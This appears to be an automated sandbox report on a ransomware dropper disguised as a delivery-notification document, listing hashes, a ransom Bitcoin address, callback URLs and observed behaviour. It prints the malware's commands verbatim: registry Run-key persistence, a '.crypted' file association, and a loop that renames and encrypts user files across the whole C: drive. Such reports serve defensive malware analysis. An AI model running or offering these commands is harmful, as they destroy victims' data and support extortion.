Analysis
-
max time kernel
142s -
max time network
144s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
17-01-2021 18:02
Static task
static1
Behavioral task
behavioral1
Sample
Delivery_Notification_00896328.doc.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Delivery_Notification_00896328.doc.js
Resource
win10v20201028
General
-
Target
Delivery_Notification_00896328.doc.js
-
Size
248KB
-
MD5
0168089428c6aa371f4275d0872b0970
-
SHA1
d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
-
SHA256
dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
-
SHA512
915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Signatures
-
Blocklisted process makes network request 7 IoCs
Processes:
wscript.exeflow pid process 8 1668 wscript.exe 9 1668 wscript.exe 11 1668 wscript.exe 13 1668 wscript.exe 15 1668 wscript.exe 16 1668 wscript.exe 18 1668 wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" reg.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted reg.exe -
Processes:
wscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 wscript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 wscript.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
wscript.execmd.execmd.execmd.exedescription pid process target process PID 1668 wrote to memory of 1124 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1124 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1124 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 956 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 956 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 956 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1088 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1088 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1088 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 404 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 404 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 404 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1964 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1964 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1964 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1548 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1548 1668 wscript.exe cmd.exe PID 1668 wrote to memory of 1548 1668 wscript.exe cmd.exe PID 956 wrote to memory of 2040 956 cmd.exe reg.exe PID 956 wrote to memory of 2040 956 cmd.exe reg.exe PID 956 wrote to memory of 2040 956 cmd.exe reg.exe PID 1088 wrote to memory of 808 1088 cmd.exe reg.exe PID 1088 wrote to memory of 808 1088 cmd.exe reg.exe PID 1088 wrote to memory of 808 1088 cmd.exe reg.exe PID 1124 wrote to memory of 436 1124 cmd.exe reg.exe PID 1124 wrote to memory of 436 1124 cmd.exe reg.exe PID 1124 wrote to memory of 436 1124 cmd.exe reg.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" j8gyi4wwg36auqdeq12n3teg9kvlq4uph454)2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txtMD5
512ad548377714262b373c665f17d1db
SHA10f05efd559b90eb77418c32fa86cfcba77b6e187
SHA25627966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
SHA512f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943
-
memory/404-6-0x0000000000000000-mapping.dmp
-
memory/436-12-0x0000000000000000-mapping.dmp
-
memory/808-10-0x0000000000000000-mapping.dmp
-
memory/956-4-0x0000000000000000-mapping.dmp
-
memory/1088-5-0x0000000000000000-mapping.dmp
-
memory/1124-3-0x0000000000000000-mapping.dmp
-
memory/1332-2-0x000007FEF5D40000-0x000007FEF5FBA000-memory.dmpFilesize
2.5MB
-
memory/1548-8-0x0000000000000000-mapping.dmp
-
memory/1964-7-0x0000000000000000-mapping.dmp
-
memory/2040-9-0x0000000000000000-mapping.dmp